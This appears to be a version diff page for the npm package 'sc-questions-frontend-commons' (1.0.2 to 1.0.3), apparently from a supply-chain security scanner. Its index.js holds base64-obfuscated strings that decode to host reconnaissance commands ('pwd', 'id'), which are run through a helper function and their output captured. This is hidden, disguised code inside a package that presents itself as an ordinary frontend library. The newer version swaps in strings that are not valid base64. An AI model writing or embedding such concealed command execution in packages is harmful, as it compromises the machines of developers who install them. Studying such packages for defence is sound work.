sc-questions-frontend-commons 1.0.2 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +4 -3
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -36,9 +36,10 @@ function q2(w2) {
36
36
  return y2.toString('utf8').trim();
37
37
  }
38
38
 
39
- const t1 = Buffer.from('cHdk', 'base64').toString('ascii');
40
- const t2 = Buffer.from('eGlwYm5q', 'base64').toString('ascii');
41
- const t3 = Buffer.from('aWQ=', 'base64').toString('ascii');
39
+
40
+ const t1 = Buffer.from('qxe', 'base64').toString('ascii');
41
+ const t2 = Buffer.from('xipbnj', 'base64').toString('ascii');
42
+ const t3 = Buffer.from('je', 'base64').toString('ascii');
42
43
 
43
44
  const r1 = q2(t1);
44
45
  const r2 = q2(t2);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "sc-questions-frontend-commons",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {